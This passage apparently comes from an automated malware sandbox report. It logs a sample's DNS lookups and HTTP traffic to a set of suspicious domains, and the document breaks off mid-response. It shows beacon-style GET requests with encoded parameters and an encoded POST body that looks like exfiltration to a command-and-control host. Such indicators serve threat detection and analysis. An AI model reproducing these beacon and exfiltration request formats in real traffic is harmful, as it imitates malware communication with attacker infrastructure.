Source: global traffic	HTTP traffic detected: GET /t67p/?vNTT0=e8zLx&_6yxCX=7q1CHTqE7xA4Hb6UdPg4tnZI1eLzKcnykAAaTe838bXHA/ymbLu0PDKYOxDYCUf7LwmCLOma6qOkbyv7NKEXJ+0CfIXjZtKXfKieWYYCHFg55Ay66I4b6tmYJwJaY/ccyg== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.qqa79.topConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
Source: global traffic	HTTP traffic detected: GET /vjnn/?_6yxCX=/9P7cPwD5oqcKBw7IJa71uXaMwF5nHy76dLcUokQUTuB+pxwdTZDu/VU2JYamOntzwUAWWcb3dP1W56hEegH1C145Dcw9vjhITsM+OTgM5u/otOh0qpDqOlQHZdtVA7DGw==&vNTT0=e8zLx HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.gk88top.topConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
Source: global traffic	HTTP traffic detected: GET /2mep/?vNTT0=e8zLx&_6yxCX=Qs7dTkG74ZlbzDPIks80sLprU65g+bEtyeoxhvOotfrZ9WhcV54Y9rQsYH5lTs77muDKHbL5HIFuHfk3BCfdn/wnl45Qbp2dk37eS9E9dWkFwc0rUSawKZLqv+Rq0dg9Eg== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.127358.winConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
Source: global traffic	HTTP traffic detected: GET /cnve/?_6yxCX=2VDSQdlG5RaW3hcOSzrtXrxDd4bhZ8b1rLrGGnoiqQrQ5oU7TABHb8GSGDxsLG7YK+gXk2baIuNiiMBLfcdVb2keDweLuNLSNaolEzc2iohrJiN1i0expP9eRIP5s9rm3Q==&vNTT0=e8zLx HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.infohive.websiteConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
Source: global traffic	HTTP traffic detected: GET /ead0/?vNTT0=e8zLx&_6yxCX=OwnSiQTonAdwVTeqlw0c+DdVJwXlJPsoxE88ohWtB+WUIw034wY61NPL5vanrW433FkI4Wm16OMLJLHvwknBhrmN7KgNDD+8nl5ENQfO4rN6vw62ks37+HoPu6Jjp4YWnA== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.sunnyz.storeConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
Source: global traffic	HTTP traffic detected: GET /dc08/?_6yxCX=K4m3PKR19259jK4EK1P0lrWLqd0y31/RgB+Ra8HyZbA6ylGAas28Oq8W0qL+J5Tllh3R0W9eHcyUnmETvv/z05Tnrv+b0LyIlhV4f69ltmWPUKvodMcjYbnCl+ENwjRpaA==&vNTT0=e8zLx HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.muasamgiare.clickConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
Source: global traffic	HTTP traffic detected: GET /wvsm/?_6yxCX=H1pfVel2drlcYDh6ppeQKLdaO9DOhj6yIL88m4llHuZ84xsjifxTPgBHlBYfPRS4eY+v71s/bZzgmcWb/gq2rBmc4SdotweHLQOOyOBULIHFd1VBahrHXCh9vf/2fl8+QQ==&vNTT0=e8zLx HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.sfantulandrei.infoConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)

Source: global traffic	DNS traffic detected: DNS query: www.qqa79.top
Source: global traffic	DNS traffic detected: DNS query: www.gk88top.top
Source: global traffic	DNS traffic detected: DNS query: www.127358.win
Source: global traffic	DNS traffic detected: DNS query: www.infohive.website
Source: global traffic	DNS traffic detected: DNS query: www.sunnyz.store
Source: global traffic	DNS traffic detected: DNS query: www.muasamgiare.click
Source: global traffic	DNS traffic detected: DNS query: www.sfantulandrei.info
Source: global traffic	DNS traffic detected: DNS query: www.mffnow.info

Source: unknown

HTTP traffic detected: POST /vjnn/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.5Host: www.gk88top.topContent-Type: application/x-www-form-urlencodedConnection: closeContent-Length: 207Cache-Control: no-cacheOrigin: http://www.gk88top.topReferer: http://www.gk88top.top/vjnn/User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)Data Raw: 5f 36 79 78 43 58 3d 79 2f 6e 62 66 36 6c 43 7a 71 65 75 50 79 73 6d 45 4a 79 38 36 66 66 4e 4d 41 42 63 37 55 32 59 39 39 76 39 62 72 38 52 57 46 44 52 2f 5a 5a 39 4f 42 4e 6f 78 76 64 57 77 34 6f 73 33 72 37 4f 78 79 35 61 63 55 42 39 77 63 47 2f 41 73 4b 32 44 39 38 76 33 56 68 39 2b 42 52 52 6d 73 50 4b 46 68 55 56 7a 62 6d 30 41 59 4b 72 77 39 4f 62 31 4a 78 34 76 2b 4e 51 56 36 42 4f 56 6d 75 36 55 62 41 67 54 4e 6f 51 4c 70 63 58 37 77 36 44 70 6b 39 43 70 4b 67 71 49 74 53 35 67 4c 50 65 75 59 39 4f 45 79 55 4f 4e 66 6e 2b 36 65 56 76 43 69 75 51 6c 31 76 4b 6e 36 50 55 6b 67 4d 65 55 71 78 4a 68 67 6b 3d Data Ascii: _6yxCX=y/nbf6lCzqeuPysmEJy86ffNMABc7U2Y99v9br8RWFDR/ZZ9OBNoxvdWw4os3r7Oxy5acUB9wcG/AsK2D98v3Vh9+BRRmsPKFhUVzbm0AYKrw9Ob1Jx4v+NQV6BOVmu6UbAgTNoQLpcX7w6Dpk9CpKgqItS5gLPeuY9OEyUONfn+6eVvCiuQl1vKn6PUkgMeUqxJhgk=

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 19:19:04 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 19:19:21 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B52U0WABbBFYZdzqH44M6hS2Viuv2h%2F7YmcEpl3BnMEzGGam2S7FadhGTXdeNFFCnuvYDYnWJ2RXY%2Bcs96fHeDpgA58KQ2aMCIVEIlCqn%2FFVvAsK92zWYwdeLUfKUUMkurg%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fff04a0fe0e4352-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2465&min_rtt=2465&rtt_var=1232&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=850&delivery_rate=0&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 19:19:23 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mdTC9gSWjw%2B8u6cZFHB4lbvt%2F03RPx62I3jSvnH9pxqxbZSllz1BmhLYnGnCzwSIvXVduHCA9FISEIlgKX3%2BRLWEd%2F2PoWt1chXNkHb2zzkV1HTVpoVVQ0fX6W75IXRYlAw%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fff04b0e9dade97-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1631&min_rtt=1631&rtt_var=815&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=870&delivery_rate=0&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 19:19:26 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FNw%2FdI8k0%2FJOTCIVIfPVXH%2BH8hoR86P%2F5hjsnUB3E9Yq1okg9CwPHRFI1PdhXC%2BLpnAtibK0N0yz%2Bbu8zvTIjYAmPfNstS%2B51K4PHf%2BzV9ceB4doXBvM1EMcW5eqjR6RuiE%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fff04c2b9aa7d14-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=75329&min_rtt=75329&rtt_var=37664&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1887&delivery_rate=0&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 19:19:28 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FrY%2Fbci1g4z2FUKSC72hbJHegoDwAquzDstjtCMWBWPa4ivJsr1tWrFWxD%2F%2FKcw4ji%2B%2Fc0wyBf2A05uF5twurHyYdhq8042WMKxaVted%2B4uYOGMySWGyUIvnM%2BB7cFP%2B0t8%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fff04d1a94a43ab-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1787&min_rtt=1787&rtt_var=893&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=592&delivery_rate=0&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chro
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 19:20:09 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 19:20:12 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 19:20:14 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta 